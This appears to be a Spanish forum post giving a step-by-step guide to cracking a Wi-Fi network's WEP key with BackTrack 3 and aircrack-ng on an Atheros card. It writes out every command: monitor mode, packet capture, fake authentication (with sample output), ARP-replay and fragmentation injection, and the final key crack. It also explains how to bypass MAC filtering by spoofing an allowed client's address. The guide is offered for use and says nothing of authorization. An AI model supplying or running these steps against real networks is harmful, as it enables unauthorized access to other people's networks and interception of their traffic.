Si tienes atheros descarga backtrack 3 final, es un cd de linux que no se instala, solo grábalo y ponerlo en el cd con el pc booteado y deja hasta que se cargue, este aircrack viene incluido en el y es la ultima versión.
Estos son los pasos para obtener la clave con atheros usando backcrack 3
Link backtrack:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd
Poner en modo monitor.
Abrir una terminal y poner lo siguiente:
wlanconfig ath0 destroy
wlanconfig ath create wlandev wifi0 wlanmode monitor
ifconfig ath0 up
Ahora los comando siguientes se hacen en terminales distintas
********************* Escucha ***************************
airodump-ng --bssid MacAP --channel CANAL -w NombreArchivo ath0
********************* asociacion falsa **********************
aireplay-ng -1 0 -e NombreRed -a MacAP -h TuMac ath0
Si ha ido bien verás algo como esto:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful
U otra variación para algunos puntos de acceso rebeldes:
aireplay-ng -1 6000 -o 1 -q 10 -e NombreRed -a MacAP -h TuMac ath0
Donde:
* 6000 - Reautenticación cada 6000 segundos. Es el periodo en el que se enviarán paquetes de “sigo aquí” o “keep alive”.
* -o 1 - Envia solo un tipo de paquetes de cada vez. Por defecto está configurado para que envie múltiples y esto puede confundir a algunos APs.
* -q 10 - Envia los paquetes “sigo aquí” cada 10 segundos.
Si funciona bien aparecerá algo como esto:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
# etc...
En este punto, puedes abrir otra shell y probar la inyección.
Si tienes suerte estarás bien asociado y ahora verás aumentar los IVs.
No pierdas de vista la ventana con la falsa autenticación para asegurarte de que estás asociado.
Problemas típicos
* Hay ocasiones en que a pesar de decirte que estás asociado
y que veas que te dice que está enviando paquetes “keep alive”,
la asociación no está funcionando. Tendrás que parar (con Ctrl+C) y reiniciar
(flecha arriba y enter) el comando.
* Con algunos drivers, la dirección MAC de la tarjeta wireless tiene que ser
la misma que la dirección MAC con la que quieres inyectar. Por lo que si no
te funciona la autenticación falsa prueba a cambiar la dirección MAC por la misma
con la que estás intentando la autenticación. Un programa para hacer esto es macchanger.
Busca en los foros o en internet para ver con detalle como hacer esto.
* Algunos puntos de acceso están configurados para permitir únicamente la asociación
de una/s direcciones MAC determinadas (filtrado MAC). Si este es tu caso, no serás
capaz de hacer una autenticación falsa, a no ser que conozcas la dirección MAC de un
cliente que este incluido en la lista del AP. La ventaja de la siguiente técnica (ataque interactivo)
es que evita este control.
********************* Inyeccion *************************
Un de las mas usadas es ARP Request Replay Attack:
aireplay-ng -3 -h TuMac -b MacAP ath0
o bien
aireplay-ng -4 -h TuMac -f 1 ath0
Y al final:
aircrack-ng -z NombreArchivo ath0